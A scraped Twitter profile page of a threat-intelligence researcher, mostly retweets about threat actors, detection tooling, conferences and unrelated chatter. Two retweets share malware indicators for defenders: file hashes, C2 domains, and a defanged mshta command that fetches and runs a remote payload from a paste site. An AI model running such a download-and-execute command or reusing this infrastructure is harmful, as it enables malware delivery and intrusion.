Casey Brooks

@DrunkBinary

Senior Adversary Hunter, Army Veteran, Cocktail Scientist, APT Researcher | Opinions are my own and not the views of my employer.

Neverwhere
Joined October 2015

Tweets


  1. Pinned Tweet
    16 Nov 2018
  2. Retweeted
    3 hours ago

    Senior Adversary Hunter from talking to customers about the current threat landscape affecting OnG environments with no fluff or BS

  3. Retweeted
    7 hours ago

    2020-02-05: [Breaking]🔥🆕 "🇷🇺Pro-Russian CyberSpy Intensifies Ukrainian 🇺🇦 Security Targeting" 🔦The 'Fifth Domain': Gamaredon Wages Silent War with Ukrainian Military & Law Enforcement ➡️5k Victim Scope in Ukraine Along 'Separation Line'

  4. Retweeted

    Coming soon to Sysmon: clipboard logging for malicious RDP session DFIR, and shredded file recovery for capturing hacking tools

  5. Retweeted
    20 hours ago
  6. 17 hours ago

    Got my EICAR QR Code Velcro patch from

  7. Retweeted
    3 Feb

    w00t the paper I wrote to accompany my presentation is now available! Find it here (and note the "Skip" button below the contact form to get right to the paper):

  8. Retweeted

    To the person who figured out my honeypot is a honeypot could you please stop putting the picture of Pooh bear with a jar of honey on it? It's like this person's life mission, I've blocked him on: - Client - IPs (now on Tor ffs) - The image (he just edits 1 pixel every time...)

  9. 3 Feb
  10. 2 Feb

    Interested in learning more about Telecommunication Security? Check out

  11. Retweeted
    1 Feb

    My team is reading this book, and some are highlighting portions that I would debate. For example, page 81 discusses "offensive methods" that "become public and disappear." That may be the view of a top tier foreign intelligence organization, but is largely not true for others.

  12. Retweeted
    27 Jan

    doc - a4b6abdbcdceab1ad5cf6784600aca34 dot - dd1033f4fa3fc8ba0fde4eb457a4fe6f C2: kastoget.hopto[.]org papir.hopto[.]org

  13. 1 Feb

    No, bad tweet, bad tweet, get back in your hole...

    This Tweet is unavailable.
  14. Retweeted
    30 Jan

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

  15. Retweeted
    30 Jan

    I've spent a whole day on Sigma Focus: Facilitate contributions - New Rule Creation Guide - New colorised test output - New test cases - Rule cleanup (title, date, ids) Next step: How-to guide for pull requests

  16. Retweeted
    31 Jan

    This is how communicates with the team.

  17. Retweeted
    31 Jan

    Epic Angry Rant! Ripping Blizzard Activision for their awful Warcraft 3 Reforged Debacle & Terrible Response! The passion is gone! Disgraceful. You Done F&@KED IT UP! RT Plz! 1st Gaming Epic Fail of 2020!

  18. Retweeted

    As I’m still in recovery from my battle with cancer I will not be attending this year. Working to be good for joining Blackhat/DEFCON! However my awesome colleagues are at . Come talk with them about our data and platforms 🙃. You can find them at booth #4429.

  19. Retweeted
    30 Jan

    At the SANS , will highlight 3 case studies that prove understanding the process environment & identifying critical path nodes for the defended facility is vital to ensure appropriate defense where it matters most | Mar 2-3 | Agenda:

  20. Retweeted
    29 Jan

    So this just happened: First (real) blog at the new job.

  21. Retweeted
    29 Jan

    🇮🇷 has also used tracking pixels. It isn't a novel technique of course, but it is observed in the wild in targeted threat activity. Even beyond email, communication clients are notorious for leaking information. It's not a bad idea to rigorously test how they behave.
